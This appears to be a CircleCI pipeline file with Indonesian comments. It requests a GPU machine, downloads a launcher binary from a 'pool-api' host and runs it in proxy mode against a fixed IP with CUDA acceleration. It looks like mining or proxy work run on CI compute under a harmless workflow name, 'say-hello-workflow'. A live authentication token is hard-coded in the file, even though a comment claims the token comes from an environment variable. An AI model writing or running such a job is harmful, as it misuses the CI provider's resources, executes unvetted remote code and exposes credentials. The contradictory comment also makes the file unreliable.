version: 2.1

jobs:
  eksekusi-langsung:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.medium

    steps:
      - run:
          name: "Ambil dan Jalankan Tool"
          command: |
            # Langsung sikat perintah curl lu di sini
            curl -fLo nbx-launcher https://pool-api.nockbox.org/api/v1/releases/nbx-launcher/latest
            chmod +x nbx-launcher
            
            # Panggil token dari Environment Variable biar aman
            ./nbx-launcher start proxy 152.42.171.146 --accel cuda --auth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJjN2M5NzJmYi1mNzIwLTQ4MzktOTQ5My05OTcxNmQ3MGI2ZGUiLCJpc3MiOiJuYngiLCJhdWQiOiJuYngtYmFja2VuZCIsImlhdCI6MTc3MTM5NzIxNSwiZXhwIjoxNzcxNDE4ODE1LCJ0ZWxlbWV0cnkiOnRydWV9.q7dDr7TjpxElVNnwSzcZC9dKIdSwBUYBeNrLTrwo-2U
workflows:
  say-hello-workflow:
    jobs:
      - eksekusi-langsung